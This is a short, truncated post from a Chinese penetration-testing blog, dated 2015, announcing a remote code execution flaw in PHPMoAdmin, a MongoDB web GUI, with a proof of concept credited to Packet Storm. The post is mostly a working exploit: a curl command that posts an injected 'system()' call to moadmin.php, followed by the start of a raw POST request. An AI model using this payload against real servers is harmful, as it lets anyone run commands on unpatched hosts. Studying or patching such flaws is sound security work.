Code - 暗月博客|网络安全,WEB渗透,数据安全,渗透编程,安全培训

PHPMoAdmin Remote Code Execution(附POC)

mOon    渗透测试     2403次查看    抢沙发    2015年03月11日

五道口杀气 from:http://packetstormsecurity.com/files/130638/phpmoadmin-exec.txt mongodb Gui存在命令执行 POC: curl "http://path.to/moadmin.php" -d "object=1;system('id');exit" POST /moa...